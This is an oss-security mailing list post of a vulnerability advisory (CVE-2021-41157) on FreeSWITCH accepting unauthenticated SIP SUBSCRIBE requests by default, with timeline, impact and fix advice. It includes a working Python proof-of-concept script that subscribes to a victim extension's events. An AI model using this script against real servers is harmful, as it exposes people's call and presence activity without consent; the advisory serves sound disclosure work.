[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default
From: "Sandro Gauci" <sandro () enablesecurity ! com>
Date: 2021-10-25 14:24:09
Message-ID: 455d2673-74ca-4d9a-b54e-84af570f2242 () www ! fastmail ! com
[Download RAW message or body]
# FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default
- Fixed versions: v1.10.7
- Enable Security Advisory: \
https://github.com/EnableSecurity/advisories/tree/master/ES2021-08-freeswitch-SIP-SUBSCRIBE-without-auth
- Vendor Security Advisory: \
https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj
- Other references: CVE-2021-41157
- Tested vulnerable versions: <= v1.10.5
- Timeline:
- Report date: 2021-06-07
- Triaged: 2021-06-08
- Fix provided for testing: 2021-10-01
- Vendor release with fix: 2021-10-24
- Enable Security advisory: 2021-10-25
## Description
By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions \
of FreeSWITCH. Although this issue was [fixed][1] in version v1.10.6, installations upgraded to \
the fixed version of FreeSWITCH from an older version, may still be vulnerable if the \
configuration is not updated accordingly. For good reason, by default, software upgrades do not \
update the configuration.
[1]: https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e
## Impact
Abuse of this security issue allows attackers to subscribe to user agent event notifications \
without the need to authenticate. This abuse poses privacy concerns and might lead to social \
engineering or similar attacks. For example, attackers may be able to monitor the status of \
target SIP extensions.
## How to reproduce the issue
1. Install FreeSWITCH v1.10.5 or lower
2. Run FreeSWITCH using the default configuration
3. Register as a legitimate SIP user on the FreeSWITCH server using a softphone (e.g. \
sip:1000@192.168.188.128 where 192.168.188.128 is your FreeSWITCH server) 4. Save the below \
Python script to `anon-subscribe.py` 5. Run the script from an IP address that is different \
from that of the softphone `python anon-subscribe.py <freeswitch_ip> <freeswitch_port> \
<victim_extension>` 6. Perform some operations using the softphone, such as deregistering, \
registering, and placing a call 7. Observe that several notifications are received by the \
script, exposing the actions being performed by the victim
```python
import socket, string, random, re, sys
UDP_IP = sys.argv[1]
UDP_PORT = int(sys.argv[2])
EXT = sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msg_template = "SUBSCRIBE sip:%s@%s;transport=UDP SIP/2.0\r\n" % (EXT, UDP_IP) + \
"Via: SIP/2.0/UDP [ip]:[port];rport;branch=z9hG4bK-[rand]\r\n" \
"Max-Forwards: 70\r\n" \
"Contact: <sip:%s@[ip]:[port];transport=udp>\r\n" % (EXT, ) + \
"To: <sip:%s@%s;transport=UDP>\r\n" % (EXT, UDP_IP) + \
"From: <sip:9999@%s;transport=UDP>;tag=[rand]\r\n" % (UDP_IP, ) + \
"Call-ID: [rand]\r\n" \
"CSeq: 1 SUBSCRIBE\r\n" \
"Expires: 600\r\n" \
"Accept: */*\r\n" \
"Event: [event]\r\n" \
"Content-Length: 0\r\n" \
"\r\n"
rand = ''.join(random.choice(string.ascii_letters) for i in range(16))
msg = msg_template.replace('[ip]', '127.0.0.1') \
.replace('[port]', '9999') \
.replace('[event]', 'dialog') \
.replace('[rand]', rand)
sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))
recv=sock.recv(10240).decode()
# get rport and received from Via header
rport=re.search( r'rport=([0-9]+)', recv, re.MULTILINE).group(1)
received=re.search( r'received=([0-9\.]+)', recv, re.MULTILINE).group(1)
events = [
'talk', 'hold', 'conference', 'presence', 'as-feature-event', 'dialog', 'line-seize',
'call-info', 'sla', 'include-session-description', 'presence.winfo', 'message-summary',
'refer']
for event in events:
rand = ''.join(random.choice(string.ascii_letters) for i in range(16))
msg = msg_template.replace('[ip]', received) \
.replace('[port]', rport) \
.replace('[event]', event) \
.replace('[rand]', rand)
sock.sendto(msg.encode(), (UDP_IP, UDP_PORT))
while True:
print(sock.recv(10240).decode().split('\r\n\r\n')[1])
```
## Solution and recommendations
Upgrade to a version of FreeSWITCH that fixes this issue.
Our suggestion to the FreeSWITCH developers was the following:
> Our recommendation is that SIP SUBSCRIBE messages are authenticated by default so that \
> FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. \
> When following such a recommendation, a new parameter can be introduced to explicitly disable \
> authentication.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) develops offensive security tools and \
provides quality penetration testing to help protect your real-time communications systems \
against attack.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on \
currently available information. Use of the information constitutes acceptance for use in an AS \
IS condition. There are no warranties with regard to this information. Neither the author nor \
the publisher accepts any liability for any direct, indirect, or consequential loss or damage \
arising from use of, or reliance on, this information.
## Disclosure policy
This report is subject to Enable Security's vulnerability disclosure policy which can be found \
at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic